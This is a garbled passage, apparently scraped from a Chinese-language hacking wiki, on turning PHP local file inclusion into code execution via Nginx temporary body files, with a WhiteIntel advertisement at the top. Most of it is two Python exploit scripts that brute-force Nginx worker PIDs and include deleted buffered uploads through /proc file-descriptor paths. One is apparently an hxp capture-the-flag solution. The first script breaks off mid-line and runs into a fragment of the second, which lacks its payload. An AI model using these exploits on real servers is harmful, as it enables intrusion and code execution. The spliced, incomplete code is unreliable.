LFI2RCE via Nginx temp files
最后更新于
最后更新于
WhiteIntel是一个由暗网推动的搜索引擎,提供免费功能,用于检查公司或其客户是否受到窃取恶意软件的侵害。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
示例来自https://bierbaumer.net/security/php-lfi-with-nginx-assistance/
PHP代码: ````h`
/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... ``` 注意:在这个例子中,不能直接包含`/proc/34/fd/15`,因为PHP的`include`函数会将路径解析为`/var/lib/nginx/body/0000001368 (deleted)`,而这个路径在文件系统中不存在。幸运的是,可以通过一些间接方式绕过这个小限制,比如:`/proc/self/fd/34/../../../34/fd/15`,最终会执行已删除文件`/var/lib/nginx/body/0000001368`的内容。 ## 完整利用 ```python #!/usr/bin/env python3 import sys, threading, requests # exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance # see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details URL = f'http://{sys.argv[1]}:{sys.argv[2]}/' # find nginx worker processes r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid_max' }) pid_max = int(r.text) print(f'[*] cpus: {cpus}; pid_max: {pid_max}') nginx_workers = [] for pid in range(pid_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'[*] nginx worker found: {pid}') nginx_workers.append(pid) if len(nginx_workers) >= cpus: break done = False # upload a big client body to force nginx to create a /var/lib/nginx/body/$X def uploader(): print('[+] starting uploader') while not done: requests.get(URL, data=' //'
requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload))))) except: pass
def send_payload_worker(requests_session): while True: send_payload(requests_session)
def send_payload_multiprocess(requests_session):
for _ in range(multiprocessing.cpu_count()): p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,)) p.start()
def generate_random_path_prefix(nginx_pids):
path = "" component_num = random.randint(0, 10) for _ in range(component_num): pid = random.choice(nginx_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path
def read_file(requests_session, nginx_pid, fd, nginx_pids): nginx_pid_list = list(nginx_pids) while True: path = generate_random_path_prefix(nginx_pid_list) path += f"/proc/{nginx_pid}/fd/{fd}" try: d = requests_session.get(SERVER + f"/?action=include&file={path}").text except: continue
if "hxp" in d: print("Found flag! ") print(d)
def read_file_worker(requests_session, nginx_pid, nginx_pids):
for fd in range(10, 45): thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids)) thread.start()
def read_file_multiprocess(requests_session, nginx_pids): for nginx_pid in nginx_pids: p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids)) p.start()
if name == "main": print('[DEBUG] Creating requests session') requests_session = create_requests_session() print('[DEBUG] Getting Nginx pids') nginx_pids = get_nginx_pids(requests_session) print(f'[DEBUG] Nginx pids: {nginx_pids}') print('[DEBUG] Starting payload sending') send_payload_multiprocess(requests_session) print('[DEBUG] Starting fd readers') read_file_multiprocess(requests_session, nginx_pids)